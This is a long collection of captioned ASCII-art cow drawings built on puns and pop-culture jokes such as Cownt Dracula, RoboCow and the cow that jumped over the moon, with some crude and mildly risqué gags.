- || ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~
- ______||_______
- | EASY CREDIT | (__) (__) (__) (__)
- |_____________| (uu) (uu) (uu) (uu)
- || /-------\/ /-------\/ /-------\/ /-------\/
- || / | || / | || / | || / | ||
- || * ||----|| * ||----|| * ||----|| * ||----||
- || ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-------\/ /-------\/ /-------\/ /-------\/
- / | || / | || / | || / | ||
-* ||----|| * ||W---|| * ||w---|| * ||V---||
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^
- Cow Cow laden Same cow Nancy Reagan-type
- with milk after milking cow with milk
- (___) (___) * (___) (___)
- (o o) (o o) \ (o o) (o o)
- /-------\ / /-------\ / \-------\ / /-------\ /
- / | ||O / | ||O | ||O / | ~#>-+|O
-* ||,---|| * ||@\--|| ||,---|| * ||,----|
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^
- Bull Same bull after Rotc bull after Red-blooded American Bull
- seeing above cow seeing other bull shooting the Rotc bull
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-------\/-* /-------\/ /-------\/ ~~~~~~~~~~~~~~~~~~~~~
- / | || \ )*)(\/* / * / | ||
-* ||----|| * \ |||/)|/()( ~~~~~~~~~~~~~~
-\/|(/)(/\/(,,/ \)|(/\/|)(/\
- Cow munching Grass munching Cow in water Cow in trouble
- on grass on cow
- (__) (__) * (__) * (__)
- (oo) (oo) \ (oo) | (oo)
- /--------\/ /-oooooo-\/ \-------\/ \-------\/
- * o| || * ooooooooo o o| || / ||
- ||----|| ooooooooooooo ||----||>==/-----||
- ooo^^ ^^ ooooooooooooooooo ^^ ^^ ^^
- Cow taking Cow in deep Cow getting the shit
- a shit shit kicked out of her
- (__)
- (oo) U
- /-------\/ /---V
- / | || * |--| .
-* ||----||
- ^^ ^^
-Cow at 1 meter. Cow at 100 meters. Cow at 10,000 meters.
- (__) )__( vv vv
- (oo) (oo) ||----|| *
- /-------\/ *-------\/ || | /
- / | || / | || /\-------/
-* ||----|| / ||----|| (oo)
- ^^ ^^ vv vv (~~)
-American Cow Polish Cow Australian Cow
- (__) (__) (__)
- (oo) ____ (oo) _---_(oo)
- /-------\/ /- --\/ /- -\/
- / | || / | || /| ||
-* ||----|| * ||___-|| * ||___-||
- ^^ ^^ ^^ ^^ ^^ ^^
-Freshman Cow at Freshman Cow Freshman Cow
-start of school After the "Freshman 15" After the "Freshman 20"
- (__) (__) (__)
- (OO) (@@) (xx)
- /-------\/ /-------\/ /-------\/
- / | || / | || / | ||
-* ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-Cow who drank Jolt Cow who ate Cow who used Jolt to wash
- psychadelic mushrooms down psychadelic mushrooms
- /\ __
- / \ ||
- (__) (__) \ / (_||_)
- SooS (oo) \/ (oo)
- /------S\/S /-------\/ /S /-------\/
- / | || / | || / S / | ||
- * ||----|| * ||----||___/ S * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
- This cow belonged Ben Franklin owned Abe Lincoln's
- to George Washington this cow cow
- (__)
- * (__) (oo)
- \ (oo) /------\/
- \-------\/ /| |/ |
- | ==$ || / | [) ||
- ||----|| * ||----||
- ^^ ^^ ^^ ^^
- Old "One Arm" belonged This cow is obviously
- to Ceasar's Palace Hugh Hefner's Heifer
- (___) (__) (__)
- ( O ) (oo) (oo)
- /-------\ / \/--------\/
- / | ||V | |
- * ||----|| ||------||
- ^^ ^^ ^^ ^^
- The cyclops that Jason and This cow lived with
-the Argonauts met had this cow Dr. Doolittle
- (__) (__)
- [##] (@o)
- /-------\/ /-------\/ /------- (__)
- / | || / | || / | || (oo)
- * ||----|| * ||----|| * ||----|---\/
- ^^ ^^ ^^ ^^ ^^ ^
- This cow belonged This cow lived with This cow belonged to
- to Flash Gordon the Little Rascals the Headless Horseman
- (____) (____) (____)
- (oo ) (o o) ( O O)
- /-----------\ / /-----\ /---- /-----------\ /
- / || | \/ / | | \/ | / || | \/
- / || |||| \ | | | | | / || ||||
- * ||||-----|||| *| | |-----| | | * ||||-----||||
- /\/\ /\/\ /\ /\ /\ /\ ^^^^ ^^^^
- This cow belonged This was Salvatore No one was sure whether
- to Pablo Picasso Dali's favorite cow M.C. Escher's cow had four
- legs or eight
- (__)
- (__) (oo) (__)
- (oo) /\/ (oo)
- /-------\/ /--/-- \/-----
- / | || / | `-. / | `-.
-* ||----|| * ||----|| * ||----||
- Cow-vertible . . .
- (__)
-*_ *_ ( oo *_
- \ (__) \ /\/ \ (__)
- \.----( oo____ \.-/----._____ \.( oo___\____
- ||____\/____ \ ||__________ \ |_\/________ \
- Cow-vette Cow-vertible (of cowrse)
- * (___) * (___) (__)
- \ (o o) \ (o o) (oo)
- \-------\ / \-------\ / /-------\/ ________
- | ||O | ||O / | ||_|/ O _______
- ||,---|| ||,---|| * ||----| --
- ^^ ^^ ^^ ^^ ^^ ^
- Twins Cow Catcher
- (__)
- (__) [@@] ? (__) ? (__)
- (oo) <=|^^|=> ? (oo) ? |\/|(oo)
- /-------VV /--------- \/ /-------\/ /--| \--\/
- / | || / | || / | || / | ||
-* ||----|| / | || * ||----|| * ||----||
- ^^ ^^ * ||------|| ^^ ^^ ^^ ^^
- ^^ ^^
- Cownt Dracula Francownstein Where Cow Cow bird
- Cow Cow
- (^^) ( (oo) (__)
- (oo) ) (OO) (oo)
- /-------==--- /------\--/ /------||||||
- / | || / | || / | UX` \||/
-* ||----|| * ||----|\O---< HONK! * ||----||
- ^^ ^^ ^^ ^ ^^ ^^
- Groucho's Harpo's Karl's
- cow cow cow
- (yes, that's the Russian symbol.
- Use your imagination.)
- O__O \_|_/
- (oo) (oo)
- /-------\/ /-------\/
- / | || / | ||
- * ||----|| * ||----||
- ^^ ^^ ^^ ^^
- Cow at Disneyland Cow visiting the Statue of Liberty
- (__) (__)
- ^^ (oo) (--)
- ^^^^ /-------\/ /-\/-\
- ^^^^^ / | || /| |\
- ^^^^^ * ||----|| ^ | | ^
- ^^^^^^^^ ====^^====^^==== | |
-^^^^^^^^^^^^^/ /----\
-^^^^^^^^^^^^^^^^^^ / \ \
-^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^ * ^
- Cow Hanging Ten at Malibu Cow sunning at Fort Lauderdale
- (What a bod, huh guys?)
- )\ (__)
- / \ (oo)
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Cow trying out for a part
- in the new JAWS movie
- * (__)
- \ (DD)
- \ /-------\/
- |\ / | ||_\_/
- \ | \ (__) * ||----|
- \\|| \(oo) ^^ ^
- \||\ \\/ Cow chugging brews and staring at
- ^^ \|| sunbathers at Fort Lauderdale
- \\ ||
- \\||
- \||
- ^^ / / / / / / / / / / /
- \\_ / / / / / / / / / / / /
- \_ / / / / / _______ / /
- Cow skiing a Black Diamond at Aspen / / / / | \ / /
- / / / (__)| / /
- / / / (oo)| / /
- ( @@@ ) /-------\/ |
- ( @@ ) (------------) / | ||^_|
- @@ (__) ( *>COUGH<* ) * ||----|
- @@ (oo) . . . ( *>COUGH<* ) ^^ ^
- /--UU--\/ (____________)
- / | || Cow sheltering from English Weather
- * ||---||
- (New) Jersey Cow
- O O O O
- \ \ / /
- \ \ (__) /
- (__) \ \ (xx)/
- (DD) \ +--------+\//
- /-------\/ \| | /
- / | || +--------+
- * ||----||
- ^^ ^^
-Cow fantasizing about "Riding the Mechanical Bull"
- o==+--
- | |\ \
- | | \ \ ____________________
- | \ \ \ | |
- | \ \ \ | +------------+ |
- | \ \ \ | | (__) | |
- | \ \ \| | (oo) | |
- | \ \ | | o\ .\/. | |
- | \ \| | | \/ \ | |
- /---\ \ | +------------+ |
- / \ \| |
- | | | |
- \ / | |
- \---/ | |
- | |
- --------------------------
- ( )
- --------------------------
- Cow-struction worker.
- |
- /---\
- : = :
- : :
- :,','. '. : :---\
- ..,,,',.',',;,'.';'.'.'.,.'.'..:. : :
- Cow town after a visit by the cow-struction worker.
- o o
- |__| (__) (__)
- (oo) (oo) =(oo)= oo
- /-------\/ /-------vv /-------\/
- / | || / | || / | ||
-* ||----|| * ||----|| * ||----||
- ~~ ~~ ~~ ~~ ~~ ~~
- bill bixby bela lugosi boris karloff claude rains
- male relative cow cow cow
- cow
- x
- xxxx|xxxx
- xxxxxxx|xxxxxxx
- |
- //
- (__) // (__) (__)
- (oo)// (oo)===(oo)
- /-------\// /-------\/ \/-------\
- / | |// / | || || | \
- * ||----| * ||----|| ||----|| *
- ^^ ^^ ^^ ^^ ^^ ^^
- Julie Andrews Cow Siamese cows
- o o (__) ^
- \ / (oo) /
- \ / _____\/___/
- (__) \__/ / /\ / /
- (oo) _______(oo) ^ / * /
- /---------\/ /| ___ \/ / ___/
- / | x=a(b)|| / | { }|| *----/\
- * ||------|| * ||{___}|| / \
- ^^ ^^ ||-----|| / /
- ^^ ^^ ^ ^
- Mathematical Television This cow does Disco
- Cow Cow (That's what comes of
- (developer of (Cow-thode snorting cow-caine)
- cow-culus) Ray Tube)
- o
- | [---]
- | |
- | | |------========|
- /----|---|\ | **** |=======|
- /___/___\___\ o | **** |=======|
- | | ___| |==============|
- | | ___ {(__)} |==============|
- \-----------/ []( )={(oo)} |==============|
- \ \ / / /---===--{ \/ } |
- ----------------- / | NASA |==== |
- | | * ||------||-----^
- ----------------- || | |
- / / \ \ ^^ ^ |
- / ---- \
- ^^ ^^ This cow jumped over the Moon
- (__)
- ([][]) "I have this recurring dream
- __\/_--U about golden arches.".. (__)
- /\ \__ ^ :..("")
- /\\\ / / //\ ____\_____\/ //
- /----^/__/\ /\ // \\/ \___ / //
- \\\____/--\-- // /-/__________/ //
- /====== \/ =======/==============//
- *_/ / \ /^ // / \\
- / \ ^ // \\
- Psycowlogist and patient
- (___)
- \^^^^^^^^\ (__) (o o)
- \^^^^^^^^\\ (oo) \ /
- *-----\_______\/\/ \--O--/
- ^_______/ --- \______^ // -----\
- ^--------\ \S/ /\_____^ \\/_^{} /==V===[]
- \______/ \_____\\//
- \__/
- It's a bird... //\\ The Boss
- It's a plane... // \\ (Bruce Holstien)
- // //
- ^^ ^^
- ==================
- _____________________________ H H
- | |-------------| H (__) H
- | | ________ | H (oo) H __
- | COWNTY | | (|__|) | | H / \/ \ H / \
- | JAIL | | |oo| | | H | | | | H | STOP |
- | | |__|\/|__| | H D===b=----- H \ __ /
- | | o | H^^^^^^^^^^^^^^^^H ||
- | | ^ | H H ||
- | | ] | H H ||
- | | | H H ||
- |_____________|_____________| H H ||
- ^^^^^^^^^^^^^^^^^^ ^^^^^^^
- Some cows get in trouble... Cattle Guard
- ( ( )
- ( ( ) )
- ( ( )
- ( / )
- ( ( \\ )
- ( | // )
- | | (__)
- | | (oo) (__)
- | | ----\/ ______(oo)_____
- | | || ( _)_______(__) )
- **| | ---|| \ __________/
- ``'---------^^
- Cow Hide Cow Pie
- \ | / ___________
- ____________ \ \_# / | ___ | _________
- | | \ #/ | | | | | = = = = |
- | | | | | \\# | |`v'| | | |
- | | \# // | --- ___ | | | || | |
- | | | | | #_// | | | | | |
- | | \\ #_/_______ | | | | | | || | |
- | | | | | \\# /_____/ \ | --- | | |
- | | \# |+ ++| | | |^^^^^^| | | | || | |
- | | \# |+ ++| | | |^^^^^^| | | | || | |
-^^^| (^^^^^) |^^^^^#^| H |_ |^| | |||| | |^^^^^^| |
- | ( ||| ) | # ^^^^^^ | | |||| | | | ||||||| |
- ^^^^^^^^^^^^^________/ /_____ | | |||| | | | ||||||| |
- `v'- ^^^^^^^^^^^^^ | ||||||| |
- || |`. (__) (__) ( )
- (oo) (oo) /---V
- /-------\/ \/ --------\ * | |
- / | || ||_______| \
- * ||W---|| || || *
- ^^ ^^ ^^ ^^
- "Cow Town"
- \ (__) (__)
- \\(oo) (\/)
- /-----\\\/ /-------\/
- / | (##) / | ||
- * ||----||" * ||----||
- ^^ ^^ ~~ ~~
- This cow plays bagpipes. Cow from Beijing
- (__) (__) (__)
- (\/) ($$) (**)
- /-------\/ /-------\/ /-------\/
- / | 666 || / |=====|| / | ||
-* ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-Satanic cow This cow is a Yuppie Cow in love
- (__) (__)
- (oo) (oo)
- /-'''''-\/ /-------------------\/
- / |'''''|| / | ||
-* ||''''|| * ||----------------||
- ^^ ^^ ^^ ^^
- Cow in Argyle Stretch Cow
- *
- ** **
- * ** * * * **
- * / / \ * *
- \ \ / \ / / (__)
- * / / \ \ (__) \ \ /--------(00)
- / (00) / / / | |( )
- \ /-------\/ \ \ * ||---- ||()
- / / | || / / || ||
- \ \ * ||----|| \ \ ^^ ^^
- / / ^^ ^^ / / Cow Chewing Marbles
- Cow in Heat
- (___)
- (o o)
- /------\ / (__) (__)
- / ____O (oo) (oo)
- | / /----\----\/ /-------\/
- /\oo===| / || / | ||
- | || *||^-----|| * OO----OO
- * ^^ ^^ ^^
- Cowt in the Act low rider cow
- (__) \__\ (__)
- (oo) o (oo) (oo)
- /-------\/ ____\___\/ *+-------\/
- / | || / | || ||______||
-* ||----|| * ||----|| ||----||
-Detroit cow Mustang cow pickup cow
- (__) (__) \_||_~
- (oo) (oo) (*||*)
- /---------------\/ /----\/ /-------\||/
- / | || / || / | ||
-* ||------------|| *-||----|| * ||----||
- li-moo-cow fastback cow teenager's cow
- ____
- (____)
- .xxxx.
- (__) '(oo)`
- (oo) /-----'-\/ `
- /-------\/ / | |============>
- / | || * ||----| (~)
-* ||----|| ~~ ~
- ~~ ~~ Moo-ammar Cowdafi
- holy cow armed and dangerous
- (___) (___)
- (o o) (o o)
- /-------\ / /-------\ /
- / | ||O / | O~ ||O
-* ||,---|| * ||,---||
- ^^ ^^ ^^ ^^
- A Bull A-bomb-in-a-bull No-bull
- (---)
- ( )
- /-----\ (___)
- | | (o o)
- | | | (-----) \ /
- | | | / / \ O
- | * | * | O |
- ^^ ^^ -----
- Coward Phone Bull
- | | | | *
- | | (__) | | \ (__)
- | | (oo) | | \ (oo)
- | | /-------\/ | | -----------\/--
- | | / | || | | ----| |---
- | | * ||----|| | | --------
- | \______^^____^^___ | \_________________
- | _________________ | _________________
- | / | /
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
-/ \ / \
-Cow perched on a tree. Cow attempting to fly off tree.
- | |
- | |
- | |
- | |
- | |
- | \_________________
- | _________________
- | /
- | |
- | |
- | |
- | |
- | |
- | | (__)
- | | *---------(..)
-/ \ ^^----^^\/
-The attempt results in an udder disaster.
- . /\ . . : (__)
- . / \ . . : (xx)
- / \ . . * : __------\/
- / \ * : * ||____||
- | (__) | . . ** : / | |\
- . /| (oo) |\ ** :
- / | /\/\ | \ . . * : Hamburger
- . / |=|==|=| \ . * :
- . / | | | | \ . :
- / USA | ^||^ |NASA \ . : * (__)
- |______| ^^ |______| . : \ (oo)
- . (__||__) . . : \-------\/
- . /_\ /_\ . . . : 8-| ||
- !!! !!! : ||----||
- : ^^ ^^
- The cow that jumped over the moon. : Flying Cow
- ...---...
- ../ / | \ \..
- ./ / / | \ \ \.
- / / / | \ \ \
- / / / | \ \ \
- ^^^^^^^^^^^^^^^^^^^^^^^
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /(__)
- \|/ (oo)
- /---++--\/
- / | || ||
- * ||-++-||
- ^^ ^^
- Cow surviving attack by Red Baron
- ..---.. (__)
- / \ (oo)
- | RIP | /-------\/
- | | / | ||
- | | * ||----||
- | | ^^ ^^
- | |
- Elvis's Cow... ...Or is it alive and living in tax exile???
- (__)
- (oo)
- /---+ +--\/
- / | | | ||
- * ||-+ +-||
- ^^ ^^ *
- David Copperfield's Cow David Copperfield's other Cow
- (__)
- (oo)
- /-------\/
- / | ||
- * ||----||
- ^^ ^^
- (__) (__)
- (oo) (oo)
- /-------\/ \/-------\
- / | || -^^- || | \
- * ||---- -^^- || *
- ^^ ^^
- (__) (__)
- (oo) (oo)
- /-------\/ \/-------\
- / | || || | \
- * ||----|| ||----|| *
- ^^ ^^ ^^ ^^
- Barnum's Troupe of performing cows
- (__) _--------_
- (oo) |__________| BIG
- /-------\/ XXXXXXXXXX MAC
- / | 007 || __________
- * ||----|| |_ _|
- ^^ ^^ --------
- Cow licenced to kill Enemy Cow after having met previous cow
- The cow that didn't jump
- over the moon.
- ------------------------ !
- !
- ^
- / \ Hey diddle diddle
- /___\ The cat and the fiddle
- |= =| The cow blew up on the
- | | launch pad...
- | |
- ROCKET, | |
- TOTALLY \\ | |
- OBLIVIOUS TO ||||||> | |
- THE FACT THAT // | |
- THERE IS A | |
- COW ON THE | |
- LAUNCH PAD /|##!##|\
- / |##!##| \
- / |##!##| \
- | / ^ | ^ \ |
- | / ( | ) \ |
- |/ ( | ) \|
- (( ))
- (( : ))
- (( : ))
- (( ))
- (( ))
- ( )
- . *
- .
- _ _ *
- * \\ *= //
- COW BLOWING \\ \\ =* //
- UP,ON THE ||||||>> * * ( __ )
- LAUNCH PAD // * * * . _ (oo) *
- // *= *= * BOOM * ()
- // *= * * * ==* \\
- ________________________________________________ = * \\
- ==============================================
- // // !! \\ \\
- // // || \\ \\
- (__)
- (oo)
- /'^^^-m
- (__) / '' ` )
- (oo) o /| /|/|_ | /|
- / \/ / / _ / | | | |
- / _\===^ ___\_____/___ |_____|_|
- ___|__/ |/\ (___________(_) //|| ||
- * ^ ^ * ww ww
- Mrs. O'Leary's Cow Cow'nt Dracula
- ____ ____ |+++++|
-|++++| ___ |++++| ____ |+++++|
-|++++| |++ ______________________ |++++| |+++++|
-|++++| |++/ /( )\ \ |++++| |+++++| __
-| | |+| |-oo- | \______ |++++| |+++++| |++|
------(__)--| \__\/ _(__)_ \ ----------------------------------
- o ( oo /_______________________| (oo) \ | __
- | _/\_| | M O O - B U S T E R S|__\/\ /| | /oo| - Bleaurgh!
- |-| \\____ ------ )_ /| /\
- -|_ \_|-_|^^^^^^^^^^^^^^^^^^^^^^^^^^ 0 _| * \/ *
- \ | __________________________________/
- | W| \ \_/ /----------------- \ \_/ /
- / /\ \ \___/ \___/
- / / \ \
- ^^^ ^^^ Who you gonna call...?
- (__) (__) (__) (----------)
- (00) (-o) (--) . . . ( *>YAWN<* )
- /------\/ /------\/ /------\/ (----------)
- /| || /| || /| ||
-* ||----|| * ||----|| * ||----||
-Cow w/ Glasses Flirtatious cow (winking) Cow after pulling an all-nighter
-* (__) (__) (__) (__)
- \ (oo) (oo) (oo) (oo)
- \-------\/ /-------\/ /-------\/ /-------\/
- /| |\ / / \ / \ / / \ \
- //||----||\\ * //------\\ * \\--// * \\----\\
- ^ ^^ ^^ ^ ^ ^ ^ ^ ^ ^
-Cow walking Cow jogging Same cow Cow braking
- (__)
- (oo) (__) o * (__)
- \/ (oo)/ " | (oo)
- ____| \____ /-------\/(__ o=o=o=|------\/
- ---/ --** / | / | |
- *____/ |___// * ||----|| ||----||
- //--------/ ^^ ^^ ^^ ^^
- //__ Cow Cow pooing
- Cow marching standing
- Side Front Side back (___) Where's all the bulls!
- (__) (__) (__) (__) (O O)/
- ( oo (oo) oo ) ( ) ^ _/\ /\_ ^
- /\_| /\/\ |_/\ / \ \\/ O \//
- ______
- (__) | | (__)
- (oo) | | ($$)
- ----\/ /-----^^^^^^ /-------\/
- || / | || / | IRS ||
- ---|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^
- Eric the half a cow The unknown cowmic Tax Accowntant
- (___) (___) (___)
- (0 0) (0 0) (0 0)
- \ / \ / \ /
- __[_V_]__ __[_V_]__ __[_V_]__
- /_________\===: /_________\===: /_________\===:
- \OOO---OOO/ \OOO---OOO/ \OOO---OOO/
- Cowed Forces
- \ _ /
- - ( ) - /\
- / " \ /| | (__)
- (__) / | | (oo)\
- ________(oo) /____| | \/| \
- /| \/ / \/ | \
- / |_______|| __(_______ |||__ \
- * || || |__________| ||| ____\---*
- ^^ ^^
- Thomas Edison's cow Cow hearing his master's voice
- ) ( _
- (____) / \ (__) ==========I
- / = = \ ~ ==' `== (oo) \ |||||| I
- (-O--O-) ~ 8 O O 8 /-------\/ \ ||||| I
- ( ) ~ /------- ( ) / | ||__o=< \ |||| I
- /------- ||||||====== / | || \_/ * ||----| \ ||| I
- / | || \/ * ||----|| ~~ ~ \ || I
-* ||----|| ~~ ~~
- ~~ ~~
- Groucho Moo-x Chico Harpo
- ______________________ _______________________
- | | | |
- | (__) | | (__) |
- | (oo) | | (oo) |
- | /-------\/ | |---\/ /----|
- | / | || | | || / | |
- | * ||----|| | |--|| * ||--|
- | ^^ ^^ | | ^^ ^^ |
- |--------------------| |---------------------|
- Normal Cow 0 Cow modulo one 1
- (__) (__)
- (oo) (oo)
- ______________\/______ ____ /-------\/ __
- /___/___/___/___/___/_/| /___/| / | || _/_/|
- |___|___|___|___|___|_|| |__||/|* //-----|||_|_||
- |_|___|___|___|___|___|| |_|__|/|^^ ^/|___||
- |___|___|___|___|___|_|/ |___|_|/ |___|_|/
- Cow in the GDR before... ...and after 9-Nov-1989
- ______________(__)_________________ (__)
- /_______________(oo)_______________ / (oo)
- | \/ || \/
- _|_ _|| ||
- /__/_______________________________/__/| ||
- ( ) ( )| ||
- | |________________________________| | | ||
- \_____________________________________/] /------- /
- [] [] [] / | ||
- * ||----||
- COW-CH ^^ ^^
- Cowraffe
- * *
- \ /
- \ /
- /^^^^^^^^^^^^^^^^^^^^^^^\ \/
- / (__) \ +----------+
- | (oo) ^^^^^^^^^^^\ | | |
- |^^^| \/. \\ // \_* |^^^| | |
- | |-----`//`====='\\-----| | | |
- | |-----//---------||----| | | |
- | |_ _ _"_ _ _ _ _ "_ _ _| | +----------+
- ^||^ ^||^ || ||
- +------------+ +
- | B A T E S | (__) o
- | (0x) ( ) |C O R R A L | (**) /|
----------- | \/ ( ) +------------+ \==/ / |
-|\ \ W------ | | ( ) v
-| ---------- *---- ====; ( )
-| | (__) | \ / ( )
-\ | (oo) | \ | ( )
- \ | \/ | \+ | ( )
- ---------- + ( )
- Ice Cowbe COWBOOOOOM! | |
- o o
- Psycho Cow (with knife)
- (__)
- (oo) ------------------------- _______________________
- /-------\/ - | Don't have a Bart, man! | |\ ^ ^ /|
- / | || ------------------------- | \ ^ ^ ^ / |
-* ||----|| |(_\ ^ COW-PIE ^ /_)|
- ^^ ^^ |(oo\ ^ /oo)|
- The Simpsons' cow | \/ \ ^ ^ / \/ |
- |(__) \ / (__)|
- \ / \(oo)(_\ ^ ^ /_)(oo)|
- \_____________/ \\/ (oo\ /oo) \//
- /\___________/\ \ \/ \ ^ / \/ /
- Cow in / /\_________/\ \ \ (__)\ / (__) /
- trouble / / /\_______/\ \ \ \ (oo) \^/ (oo)/
- / / / / (__) /\ \ \ \ \ \/ :(__)\//
- ___/_/_/_/_ (oo) \_\_\_\_\___ \ (__):(oo) /
- \ \ \ \ \ \/ / / / / / \(oo): \/ /
- \ \ \ \/_____\/ / / / \\/(__) /
- \ \ \/_______\/ / / \ (oo)/
- \ \/_________\/ / \ \//
- \/___________\/ \:/
- / \
- / \
- (__) (__) (______) (__)
- (oo) (oo) ( o o ) (oo)
- /--------\/ /^^^^^^^\/ /-----\ / /-------\/
-/ | | ./ {^)))))_} / | |\/ / | ||
- |--W-----| ||`` || * ||----|| * (.)(.)||
- | | | | ^^ ^^ ^^ ^^ ^^ ^^
- ^^ ^^
-cow before weight cow after Conceited Dolly Parton's
- loss program the program Cow Cow
- (___)
- ( OO
- ______ ______ _____\_ | ______ (__) ______
- | | | | | |\O cowstle | | (oo)| |
- | |____| |____| | | |__\/_| |
- | | | |
- | | (__) | |
- | __________ | (oo) | __________ |
- | | | | \/-------\ | | | |
- | | | | ___ | ___ |_\_ | | | |
- | | (__) | |_| |_|_| |__|| |__| | (__) | |
- | | (oo) | | (oo) | |
- | \___\/___/ \___\/___/ |
- | |
- | |
- ( ______ )
- ( / \ )
- ( / \ )
- ( | | )
- | | | |
- | | | |
- |_________________________|________|______________|
- \ \
- \ \
- \ \
- \ \ (__)
- \ \ (oo) /
- /---\----\/ /
- / | \ || * (__) /
- * ||---\-\\ \ ( OO /
- ~~ ~~ \---\___/\_|\=/>
- ^^ ^^ | \===/>
- \\_____// | /______/ /
- || | _________\\_\\_____/____________________
- /\------\ ^ ^ /
- (oo) \ /
- (--) * /
-Cow Circus: The flying Cowlendas Cow Circus: Tightrope walking
- ______________________
- | |\
- | (__) | |
- | (oo) | |
- | \/ | |
- | / \ \ | |
- ///////// \_ \_/////// |
- | | / | | (__)
- | /++++++< | | _____(oo)
- |==/====|==\=\=========|=|===========================\\/
- | * | \_\_ | | / | ||
- _______O)-----^---------------\O)_________________*__||----||_____
- cow-lliope in the circus parade
- *
- \
- w \ w (__)
- \\ /\ // (oo)
- \\/ \// \/
- | | (__) >--( )--<
- |(__)| (oo) / \
- \(OO)/ .-\/-. >--- {} ---<
- //\/\\ <| |> v /\ v
- || || \ \/ / | (oo) |
- ||__|| |\/\/| \(^^)/
- /^^ ^^\ /----\ | |
- / ======== \ / \ | |
- / \ /* * * \ / \/ \
- |==============| /__*_*_*_\ | \ |
- \ / || || ^ / ^
- \ ======== / ^^ ^^ *
- \ _____ /
-Cow balancing on ball Cowslip Cownilingus
- (__) -'`- "Here's
- (oo) ____________________ ( oo ^ mooing
- /-------\/ | | /\_|-- at you,
- / | |\ / | o o o o o o | | \ \__ _ kid!"
- * ||----| / ====================== | \___['
- ^^ ^ || || | ||
- Cowncillor his cowch |____|-
- | |
- ~ ~
- (__) (__) (__) (__) humphrey cow-gurt
- (oo) (oo) (oo) (oo)
- /-------\/ \/ \/ \/-------\
- / | || =================== || | \
-* ||----|| || |--| |--| || ||----|| *
- ^^ ^^ -- ^ ^ ^ ^ -- ^^ ^^ (__)
- A game of cowntract bridge (oo)
- / \/ ____________
- / \===^__| |
- ---------------------- _|___ /\ |______________|
- (__) | \-/ \-/ || | |=====| | | |
- (oo) | _|_ _|_ |__| | *I I| | | |
- /-------\/ ---------------------- I I^ ^ | |
- / | || | \-/ | | | |
- * ||----|| | _|_ |_| |_| |_| | wolfgang amadeus moo-zart
- ^^ ^^ ----------------------
- Just a humble cownoisseur
- (__) (__) (__) (__)(__) (__) (__)(__)(__) (__)
- (oo(__)oo) (__)o) (oo)((__)(__)oo) (__)(o(__)o)(__)o)(__)
- \/(oo)\/ (oo)/(__)/ (oo)(oo)\/ (oo) \(oo)/ (oo)/ (oo)
- \/ \/ (oo) \/ \/ \/ \/ \/ \/
- \/
- a cownfluence
- _______
- (__( .-< | | |
- (oo) | |___|___|
- ___\/___| |\_____/|
- | | | | |
- | | | |_______|
- >-' | | _ | _ |
- *----/\ /-------// |--(_)--|
- / \ / | || |_______| (__)
- / \ * ||----|| | | (++)
- ^ ^ ^^ ^^ |_______| \/
- Egyptian Cow Marie Antoinette's Cow
- _
- ________|@|________
- | POLICE BOX | __
- |---------------| (^\/^) \(:)/
- |_______| / | \oo/ (o|o)
- || | || | | /-----\/ /-----\_/
- ||-----|| | | /| | /| |
- ||__|__|| | | V ||----|| ^ ||----||
- | ___ | | | ^^ ^^ ^^ ^^
- | |___| | | | Vulcan Cow Klingon Cow
- | _____ | (__)
- || || (oo) ---------
- || ||----//\/ ---< Master? >
- || ||B-9 \ | ---------
- ||_____||______\|
- |_______|_______|
- ----------------
- a Certain Time Lord's Cow (__) ---< EXTERMINATE!!! |
- ( ----0 ----------------
- (___) "Moo have twenty _\/_
- |===| seconds to comply." /oooo\---O
- ________\_/ / /oooooo\
- | | | /oooooooo\
- # ||______|| /oooooooooo\
- || || /____________\
- ^^ ^^
- RoboCow a Dalek Cow
- __________________ ___________________ ___________________
- /ine McBovine McBov\ /McCow McCow McCow M\ /ttle McCattle McCat\
- /cBovine McBovine McB\ /Cow McCow McCow McCow\ /e McCattle McCattle M\
------------------------- ------------------------- -------------------------
- \ovine McBovine McBov/ \McCow McCow McCow McC/ \attle McCattle McCatt/
- \McBovine McBovine / \w McCow McCow McCow/ \ McCattle McCattle /
- ~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~
- Ronald McDonald's Cows
- @ @
- @@@ @
- @@ @
- Pffii @@@@ @@
- ___________D @@@@@@
- |________ | _______
- (__) | / \ /
- ( oo /~| | __ \ /
- /\_|// | | / \ | |
- _/____/__| | | | | |
- | ___/-----------------_| (__)
- | / \ \ \ `(oo)
- | / \ | | |\/
- | | O | / / __ /
- |----| |-----------/ \-\\\ (__)
- \ / | o | \\\ _( )_
- ________\___/____________\__/____\\\_____________/_/__\_\____
- Cow Express Suicidal Cow
- o _____________
- /\ / \
- [__] ( take off, eh! )
- __ | \ / (oo) ----'\_____________/
- \/----///\ /-------\/
- */\______(xx) / | ||__|
- ( ) * ||----| U
- ^^ ^
-Pro-democracy cow from Beijing Canadian Cow
- o o o o o o
-o o o o o o o o o o
- o o o o ( ) o ( ) o ( ( o
- O ) ( ) ( ) (
-o o (__) o o (__) o (__) o o (__)
- (oo) (oo) (oo) o (oo) o
- /------$$$$ o o /-------\/ o /-------\/ /-------\/
- / | $$$$ / | || / | || / | ||
-* ||----|| o * ||----|| * ||----|| * ||----|| o
- ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~
- Santa Cow and his rein cows caught in a Montana snow flurry
- ___
- _/...\ *==\ ________________
- __________ (___) /::::::\ (/_\) / \
- /| `(0 0) |:::::::_ (o o) | Moo, Moo, Moo |
- / | \ / /-----+-+--- \ / /\________________/
- * |||----|||-/ * / | | | | 0 ___/
- ||| ||| * | _ |_| _ |
- || --+_+- ||
-Rudolph the Red-Nosed Cow -- --
